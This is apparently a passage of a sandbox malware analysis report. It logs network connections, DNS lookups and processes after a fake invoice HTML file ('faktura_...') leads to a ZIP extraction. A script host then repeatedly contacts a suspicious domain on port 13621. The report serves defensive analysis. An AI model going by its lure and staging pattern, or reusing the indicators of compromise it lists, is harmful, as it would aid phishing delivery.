                                                                      Mar 13, 2025 09:43:03.953622103 CET44349709149.56.240.131192.168.2.8
                                                                      Mar 13, 2025 09:43:03.953751087 CET49709443192.168.2.8149.56.240.131
                                                                      Mar 13, 2025 09:43:03.956804037 CET49709443192.168.2.8149.56.240.131
                                                                      Mar 13, 2025 09:43:04.004316092 CET44349709149.56.240.131192.168.2.8
                                                                      Mar 13, 2025 09:43:05.149264097 CET49678443192.168.2.820.42.65.90
                                                                      Mar 13, 2025 09:43:05.461097002 CET49678443192.168.2.820.42.65.90
                                                                      Mar 13, 2025 09:43:05.481224060 CET44349709149.56.240.131192.168.2.8
                                                                      Mar 13, 2025 09:43:05.481313944 CET44349709149.56.240.131192.168.2.8
                                                                      Mar 13, 2025 09:43:05.481323957 CET49709443192.168.2.8149.56.240.131
                                                                      Mar 13, 2025 09:43:05.481367111 CET49709443192.168.2.8149.56.240.131
                                                                      Mar 13, 2025 09:43:05.484277964 CET49709443192.168.2.8149.56.240.131
                                                                      Mar 13, 2025 09:43:05.484293938 CET44349709149.56.240.131192.168.2.8
                                                                      Mar 13, 2025 09:43:06.070487976 CET49678443192.168.2.820.42.65.90
                                                                      Mar 13, 2025 09:43:06.570470095 CET49671443192.168.2.8204.79.197.203
                                                                      Mar 13, 2025 09:43:06.669328928 CET4971213621192.168.2.8156.229.228.198
                                                                      Mar 13, 2025 09:43:06.674014091 CET1362149712156.229.228.198192.168.2.8
                                                                      Mar 13, 2025 09:43:06.674119949 CET4971213621192.168.2.8156.229.228.198
                                                                      Mar 13, 2025 09:43:06.744873047 CET4971213621192.168.2.8156.229.228.198
                                                                      Mar 13, 2025 09:43:06.749598980 CET1362149712156.229.228.198192.168.2.8
                                                                      Mar 13, 2025 09:43:07.273586035 CET49678443192.168.2.820.42.65.90
                                                                      Mar 13, 2025 09:43:07.313518047 CET1362149712156.229.228.198192.168.2.8
                                                                      Mar 13, 2025 09:43:07.313627958 CET1362149712156.229.228.198192.168.2.8
                                                                      Mar 13, 2025 09:43:07.313735008 CET4971213621192.168.2.8156.229.228.198
                                                                      Mar 13, 2025 09:43:07.355351925 CET4971213621192.168.2.8156.229.228.198
                                                                      Mar 13, 2025 09:43:07.360649109 CET1362149712156.229.228.198192.168.2.8
                                                                      Mar 13, 2025 09:43:07.544915915 CET1362149712156.229.228.198192.168.2.8
                                                                      Mar 13, 2025 09:43:07.560110092 CET4971213621192.168.2.8156.229.228.198
                                                                      Mar 13, 2025 09:43:07.564754963 CET1362149712156.229.228.198192.168.2.8
                                                                      Mar 13, 2025 09:43:09.679828882 CET49678443192.168.2.820.42.65.90
                                                                      Mar 13, 2025 09:43:14.479619026 CET49678443192.168.2.820.42.65.90
                                                                      Mar 13, 2025 09:43:16.182904005 CET49671443192.168.2.8204.79.197.203
                                                                      Mar 13, 2025 09:43:24.086514950 CET49678443192.168.2.820.42.65.90
                                                                      Mar 13, 2025 09:43:33.635468006 CET49717443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:43:33.635529995 CET44349717142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:43:33.635632992 CET49717443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:43:33.636051893 CET49717443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:43:33.636070967 CET44349717142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:43:35.611879110 CET44349717142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:43:35.612302065 CET49717443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:43:35.612335920 CET44349717142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:43:35.612740993 CET44349717142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:43:35.613313913 CET49717443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:43:35.613383055 CET44349717142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:43:35.664220095 CET49717443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:43:45.330552101 CET44349717142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:43:45.330621004 CET44349717142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:43:45.330718040 CET49717443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:43:45.431576967 CET49717443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:43:45.431602001 CET44349717142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:43:51.302500963 CET4434968113.107.253.72192.168.2.8
                                                                      Mar 13, 2025 09:43:51.302725077 CET4434968113.107.253.72192.168.2.8
                                                                      Mar 13, 2025 09:43:51.303334951 CET49681443192.168.2.813.107.253.72
                                                                      Mar 13, 2025 09:43:51.311121941 CET49681443192.168.2.813.107.253.72
                                                                      Mar 13, 2025 09:43:51.315886021 CET4434968113.107.253.72192.168.2.8
                                                                      Mar 13, 2025 09:43:51.319873095 CET4970480192.168.2.8172.217.18.99
                                                                      Mar 13, 2025 09:43:51.324826002 CET8049704172.217.18.99192.168.2.8
                                                                      Mar 13, 2025 09:43:51.325155020 CET4970480192.168.2.8172.217.18.99
                                                                      Mar 13, 2025 09:44:06.313153028 CET6222753192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:44:06.319149017 CET53622271.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:44:06.320652008 CET6222753192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:44:06.320682049 CET6222753192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:44:06.325375080 CET53622271.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:44:06.763341904 CET53622271.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:44:06.765466928 CET6222753192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:44:06.770579100 CET53622271.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:44:06.770677090 CET6222753192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:44:33.700335979 CET62229443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:44:33.700396061 CET44362229142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:44:33.704843998 CET62229443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:44:33.707179070 CET62229443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:44:33.707201958 CET44362229142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:44:35.957252026 CET44362229142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:44:35.957802057 CET62229443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:44:35.957813978 CET44362229142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:44:35.958175898 CET44362229142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:44:35.958615065 CET62229443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:44:35.958676100 CET44362229142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:44:36.003690004 CET62229443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:44:45.521730900 CET44362229142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:44:45.521804094 CET44362229142.250.186.132192.168.2.8
                                                                      Mar 13, 2025 09:44:45.521908045 CET62229443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:44:46.647569895 CET4971213621192.168.2.8156.229.228.198
                                                                      Mar 13, 2025 09:44:46.652472019 CET1362149712156.229.228.198192.168.2.8
                                                                      Mar 13, 2025 09:44:46.656466007 CET4971213621192.168.2.8156.229.228.198
                                                                      Mar 13, 2025 09:44:47.425569057 CET62229443192.168.2.8142.250.186.132
                                                                      Mar 13, 2025 09:44:47.425597906 CET44362229142.250.186.132192.168.2.8
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Mar 13, 2025 09:42:29.673893929 CET53605261.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:42:29.690742970 CET53566161.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:42:33.251502037 CET53555491.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:42:33.442589045 CET53551961.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:42:33.572945118 CET6087253192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:42:33.573252916 CET5706753192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:42:33.580111027 CET53570671.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:42:33.580404043 CET53608721.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:42:34.981369972 CET6234953192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:42:34.981683969 CET6235353192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:42:34.988296032 CET53623491.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:42:34.989535093 CET53623531.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:42:36.449989080 CET5600653192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:42:36.451555014 CET4983353192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:42:36.485585928 CET53498331.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:42:36.643312931 CET53560061.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:42:50.558341026 CET53615931.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:43:01.323945045 CET5526753192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:43:01.331338882 CET53552671.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:43:06.643196106 CET6253253192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:43:06.661950111 CET53625321.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:43:09.619735956 CET53634171.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:43:24.696557045 CET6249353192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:43:24.724543095 CET53624931.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:43:28.754405975 CET53518561.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:43:32.564943075 CET53519881.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:43:34.017026901 CET53498731.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:43:43.508253098 CET5966853192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:43:43.521030903 CET53596681.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:44:02.267185926 CET53641161.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:44:03.205401897 CET138138192.168.2.8192.168.2.255
                                                                      Mar 13, 2025 09:44:06.311568975 CET53606791.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:44:34.399414062 CET5530953192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:44:34.418971062 CET53553091.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:45:07.977817059 CET5074253192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:45:07.996510029 CET53507421.1.1.1192.168.2.8
                                                                      Mar 13, 2025 09:45:25.415749073 CET5251753192.168.2.81.1.1.1
                                                                      Mar 13, 2025 09:45:25.434098959 CET53525171.1.1.1192.168.2.8
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Mar 13, 2025 09:42:33.572945118 CET192.168.2.81.1.1.10x472bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:33.573252916 CET192.168.2.81.1.1.10x7b7eStandard query (0)www.google.com65IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.981369972 CET192.168.2.81.1.1.10x20dbStandard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.981683969 CET192.168.2.81.1.1.10x4412Standard query (0)s4.histats.com65IN (0x0001)false
                                                                      Mar 13, 2025 09:42:36.449989080 CET192.168.2.81.1.1.10xad60Standard query (0)filehost200885.infoA (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:36.451555014 CET192.168.2.81.1.1.10xa319Standard query (0)_13621._https.filehost200885.info65IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.323945045 CET192.168.2.81.1.1.10x8629Standard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:06.643196106 CET192.168.2.81.1.1.10xbd7aStandard query (0)filehost200885.infoA (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:24.696557045 CET192.168.2.81.1.1.10xd184Standard query (0)filehost200885.infoA (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:43.508253098 CET192.168.2.81.1.1.10x9b7Standard query (0)filehost200885.infoA (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:44:34.399414062 CET192.168.2.81.1.1.10xc23bStandard query (0)filehost200885.infoA (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:45:07.977817059 CET192.168.2.81.1.1.10xce9fStandard query (0)filehost200885.infoA (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:45:25.415749073 CET192.168.2.81.1.1.10x6e5fStandard query (0)filehost200885.infoA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Mar 13, 2025 09:42:33.580111027 CET1.1.1.1192.168.2.80x7b7eNo error (0)www.google.com65IN (0x0001)false
                                                                      Mar 13, 2025 09:42:33.580404043 CET1.1.1.1192.168.2.80x472bNo error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com158.69.254.144A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:34.988296032 CET1.1.1.1192.168.2.80x20dbNo error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:42:36.485585928 CET1.1.1.1192.168.2.80xa319Name error (3)_13621._https.filehost200885.infononenone65IN (0x0001)false
                                                                      Mar 13, 2025 09:42:36.643312931 CET1.1.1.1192.168.2.80xad60No error (0)filehost200885.info156.229.228.198A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com158.69.254.144A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:01.331338882 CET1.1.1.1192.168.2.80x8629No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:06.661950111 CET1.1.1.1192.168.2.80xbd7aNo error (0)filehost200885.info156.229.228.198A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:24.724543095 CET1.1.1.1192.168.2.80xd184No error (0)filehost200885.info156.229.228.198A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:43:43.521030903 CET1.1.1.1192.168.2.80x9b7No error (0)filehost200885.info156.229.228.198A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:44:34.418971062 CET1.1.1.1192.168.2.80xc23bNo error (0)filehost200885.info156.229.228.198A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:45:07.996510029 CET1.1.1.1192.168.2.80xce9fNo error (0)filehost200885.info156.229.228.198A (IP address)IN (0x0001)false
                                                                      Mar 13, 2025 09:45:25.434098959 CET1.1.1.1192.168.2.80x6e5fNo error (0)filehost200885.info156.229.228.198A (IP address)IN (0x0001)false
                                                                      • s4.histats.com
                                                                      • c.pki.goog
                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      0192.168.2.849704172.217.18.9980
                                                                      TimestampBytes transferredDirectionData
                                                                      Mar 13, 2025 09:42:49.807209015 CET202OUTGET /r/gsr1.crl HTTP/1.1
                                                                      Cache-Control: max-age = 3000
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMT
                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                      Host: c.pki.goog
                                                                      Mar 13, 2025 09:42:50.445586920 CET222INHTTP/1.1 304 Not Modified
                                                                      Date: Thu, 13 Mar 2025 08:32:23 GMT
                                                                      Expires: Thu, 13 Mar 2025 09:22:23 GMT
                                                                      Age: 627
                                                                      Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
                                                                      Cache-Control: public, max-age=3000
                                                                      Vary: Accept-Encoding
                                                                      Mar 13, 2025 09:42:50.547525883 CET200OUTGET /r/r4.crl HTTP/1.1
                                                                      Cache-Control: max-age = 3000
                                                                      Connection: Keep-Alive
                                                                      Accept: */*
                                                                      If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
                                                                      User-Agent: Microsoft-CryptoAPI/10.0
                                                                      Host: c.pki.goog
                                                                      Mar 13, 2025 09:42:50.731925011 CET222INHTTP/1.1 304 Not Modified
                                                                      Date: Thu, 13 Mar 2025 08:32:26 GMT
                                                                      Expires: Thu, 13 Mar 2025 09:22:26 GMT
                                                                      Age: 624
                                                                      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                      Cache-Control: public, max-age=3000
                                                                      Vary: Accept-Encoding


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.849694149.56.240.1294434528C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-13 08:42:38 UTC795OUTGET /stats/0.php?4935987&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEzNC4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1
                                                                      Host: s4.histats.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-13 08:42:38 UTC135INHTTP/1.1 200 OK
                                                                      Date: Thu, 13 Mar 2025 08:42:38 GMT
                                                                      Content-Type: text/html;charset=UTF-8
                                                                      Content-Length: 376
                                                                      Connection: close
                                                                      2025-03-13 08:42:38 UTC376INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
                                                                      Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.849709149.56.240.1314436864C:\Windows\SysWOW64\wscript.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-13 08:43:03 UTC365OUTGET /stats/0.php?4935988&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Language: en-ch
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                      Host: s4.histats.com
                                                                      Connection: Keep-Alive
                                                                      2025-03-13 08:43:05 UTC135INHTTP/1.1 200 OK
                                                                      Date: Thu, 13 Mar 2025 08:43:05 GMT
                                                                      Content-Type: text/html;charset=UTF-8
                                                                      Content-Length: 376
                                                                      Connection: close
                                                                      2025-03-13 08:43:05 UTC376INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
                                                                      Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


                                                                      Target ID:0
                                                                      Start time:04:42:27
                                                                      Start date:13/03/2025
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                      Imagebase:0x7ff6a4ce0000
                                                                      File size:3'388'000 bytes
                                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:1
                                                                      Start time:04:42:28
                                                                      Start date:13/03/2025
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2148,i,14000748609247893809,15602923536421620925,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2184 /prefetch:3
                                                                      Imagebase:0x7ff6a4ce0000
                                                                      File size:3'388'000 bytes
                                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:5
                                                                      Start time:04:42:34
                                                                      Start date:13/03/2025
                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\faktura_FV2025020637756.html"
                                                                      Imagebase:0x7ff6a4ce0000
                                                                      File size:3'388'000 bytes
                                                                      MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                      Target ID:6
                                                                      Start time:04:42:38
                                                                      Start date:13/03/2025
                                                                      Path:C:\Windows\SysWOW64\unarchiver.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020637756.zip"
                                                                      Imagebase:0x4d0000
                                                                      File size:12'800 bytes
                                                                      MD5 hash:16FF3CC6CC330A08EED70CBC1D35F5D2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:7
                                                                      Start time:04:42:38
                                                                      Start date:13/03/2025
                                                                      Path:C:\Windows\SysWOW64\7za.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\nrz2r3tl.2ab" "C:\Users\user\Downloads\faktura_FV2025020637756.zip"
                                                                      Imagebase:0xb20000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

